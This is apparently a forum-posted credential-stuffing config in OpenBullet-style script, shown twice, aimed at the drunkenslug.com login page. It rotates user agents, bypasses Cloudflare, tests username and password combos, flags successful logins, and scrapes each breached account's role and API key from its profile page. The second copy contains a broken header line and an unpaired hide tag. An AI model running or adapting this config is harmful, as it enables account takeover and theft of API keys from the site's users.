[hide]
FUNCTION GetRandomUA -> VAR "UA"
BYPASSCF "https://drunkenslug.com" "<UA>"
REQUEST POST "https://drunkenslug.com/login"
CONTENT "username=<USER>&password=<PASS>&redirect="
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3"
HEADER "accept-encoding: gzip, deflate, br"
HEADER "accept-language: en-US,en;q=0.9"
HEADER "cache-control: max-age=0"
HEADER "origin: https://drunkenslug.com"
HEADER "referer: https://drunkenslug.com/"
HEADER "user-agent: <UA>"
KEYCHECK
KEYCHAIN Success OR
KEY "Logout"
KEY "Console"
KEYCHAIN Failure OR
KEY "Incorrect username or password."
REQUEST GET "https://drunkenslug.com/profile"
HEADER ":authority: drunkenslug.com"
HEADER ":method: GET"
HEADER "
ath: /profile"
HEADER ":scheme: https"
HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3"
HEADER "accept-encoding: gzip, deflate, br"
HEADER "accept-language: en-US,en;q=0.9"
HEADER "referer: https://drunkenslug.com/"
HEADER "upgrade-insecure-requests: 1"
HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
PARSE "<SOURCE>" CSS "tr:nth-child(5) > td" "innerHTML" -> CAP "ROLE"
PARSE "<SOURCE>" CSS "tr:nth-child(6) > td > a" "innerHTML" -> CAP "APIKEY"
[/hide]
FUNCTION GetRandomUA -> VAR "UA"
BYPASSCF "https://drunkenslug.com" "<UA>"
REQUEST POST "https://drunkenslug.com/login"
CONTENT "username=<USER>&password=<PASS>&redirect="
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3"
HEADER "accept-encoding: gzip, deflate, br"
HEADER "accept-language: en-US,en;q=0.9"
HEADER "cache-control: max-age=0"
HEADER "origin: https://drunkenslug.com"
HEADER "referer: https://drunkenslug.com/"
HEADER "user-agent: <UA>"
KEYCHECK
KEYCHAIN Success OR
KEY "Logout"
KEY "Console"
KEYCHAIN Failure OR
KEY "Incorrect username or password."
REQUEST GET "https://drunkenslug.com/profile"
HEADER ":authority: drunkenslug.com"
HEADER ":method: GET"
HEADER "
HEADER ":scheme: https"
HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3"
HEADER "accept-encoding: gzip, deflate, br"
HEADER "accept-language: en-US,en;q=0.9"
HEADER "referer: https://drunkenslug.com/"
HEADER "upgrade-insecure-requests: 1"
HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
PARSE "<SOURCE>" CSS "tr:nth-child(5) > td" "innerHTML" -> CAP "ROLE"
PARSE "<SOURCE>" CSS "tr:nth-child(6) > td > a" "innerHTML" -> CAP "APIKEY"
[/hide]

